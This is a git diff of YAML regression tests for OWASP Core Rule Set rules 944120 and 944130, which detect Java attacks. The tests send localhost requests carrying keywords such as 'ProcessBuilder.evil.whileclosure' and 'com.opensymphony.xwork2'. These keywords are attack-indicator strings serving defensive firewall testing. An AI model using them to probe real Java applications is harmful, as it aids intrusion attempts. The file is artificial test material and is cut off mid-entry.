"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log: + expect_ids: [944120] + - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"test": "ProcessBuilder.evil.whileclosure"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log: + expect_ids: [944120] + - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"ProcessBuilder.evil.whileclosure": "test"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log: + expect_ids: [944120] + - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-134 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 134 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.whileclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-135 + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-136 + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 136 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.whileclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 163bba932..b08f7b265 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,8481 +1,8479 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944130.yaml" - description: "Positive tests for rule 944130" +rule_id: 944130 tests: - - test_title: 944130-1 + - test_id: 1 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 2 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log: + expect_ids: [944130] + - test_id: 3 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 4 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.opensymphony.xwork2=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 5 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.opensymphony.xwork2 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 6 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 7 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 8 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 9 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.opensymphony.xwork2" - output: - log_contains: "id \"944130\"" - - test_title: 944130-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log: + expect_ids: [944130] + - test_id: 10 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.opensymphony.xwork2\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log: + expect_ids: [944130] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.opensymphony.xwork2\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log: + expect_ids: [944130] + - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 